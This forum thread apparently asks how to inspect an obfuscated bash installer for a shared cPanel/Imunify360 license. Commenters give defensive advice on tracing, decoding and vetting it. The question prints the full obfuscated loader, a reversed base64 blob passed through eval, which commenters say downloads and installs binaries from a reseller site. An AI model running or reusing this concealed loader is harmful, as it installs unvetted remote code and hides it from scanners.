# Monitor what exactly a bash script is doing

Tags: bash

I want to install a shared cPanel license , the seller is providing with a bash script to be run. I would like to see the exact steps the bash script is doing and what is altering on my server, I dont any malware surprise.  The bask script is encrypted. Is that possible ?

Here is the code

> gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" '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
> ' | r";HxJ="s";Hc2="";f="as";kcE="pas";cEf="ae";d="o";V9z="6";P8c="if";U=" -d";Jc="ef";N0q="";v="b";w="e";b="v |";Tx="Eds";xZp=""
> x=$(eval "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp")
> eval "$N0q$x$Hc2$rQW"

Comment: xtrace is your friend (`bash -x scriptname`). Beyond that, you might consider using `strace -f` to get a low-level log of not just the script but what was done by the processes it started. Even just changing `eval` to `echo` would be a starting point, though. (Personally, I wouldn't ever use cPanel at all, but I'm a grumpy graybeard who works in security).

Comment: I use free Fastpanel,  cPanel was an example , what I'm trying to buy is shared imunify360 license and I'm little sceptic about what that bash script will actually do..I don't to get in more troubles when I actually need to protect my server.

Comment: I did decode the script, and it's not doing anything obviously malicious _directly_, but it's downloading packages from some random "reseller" website, so who knows what's in them and whether that content is in turn malicious.

Comment: See https://ideone.com/nkAdAz -- mind, it looks like ideone redacts links to be only available to the person who first created a code segment, so you might need to fork and rerun it.

Comment: (honestly, I find it suspicious that they're trying to obfuscate the script at all; usually that's done by people who are either super incompetent about key management - which isn't obviously the case here - or people trying to bypass anti-malware measures; if the place they download packages from is on security tools' radar as a source of malicious code, you don't want that fact to be getting past scanners).

Comment: Which is all to say -- when I identified myself as a grumpy graybeard I meant it :) -- the kind of stack I trust to automate administration of my servers is tooling where every part of the stack is OSS and there's a very solid audit log of how every component was built / from which inputs and those builds are fully reproducible.

Comment: "If the place they download packages from is on security tools' radar as a source of malicious code" - Is there any way to find that ?

Comment: Piecemeal, but there's a mix in terms of which reputation services are publicly available and which are subscription services. https://talosintelligence.com/reputation_center/ is one option (disclosure: I used to work in a different security arm of the same parent company -- they're owned by Cisco) -- paste the URL in there and see what they think.

Comment: Downloading the packages from the decoded URLs and running _those_ through VirusTotal &c would be an additional layer of caution. Not a sure thing -- there are none, and I don't consider running binaries from a company outside jurisdictions where you could realistically sue and expect to collect a good practice in the first place -- but better than no diligence at all.

Comment: How do you see the file content? I got some error installing that bash on a test server and they gave me different file https://pastebin.com/Fue33Wu7  , what's inside this one?

Comment: Speaking to the first one: Changed the first `eval` to an `echo` running the code inside an online sandbox. Read the output of that echo, which was reversing content then base64 decoding it then evaling the result, and just took out the eval and let the output of the reverse and base64 decode operations go to stdout.

Comment: Anyhow, the new file is a compiled executable, not a script itself, so it would require different tools to reverse engineer. I'd start with https://ghidra-sre.org/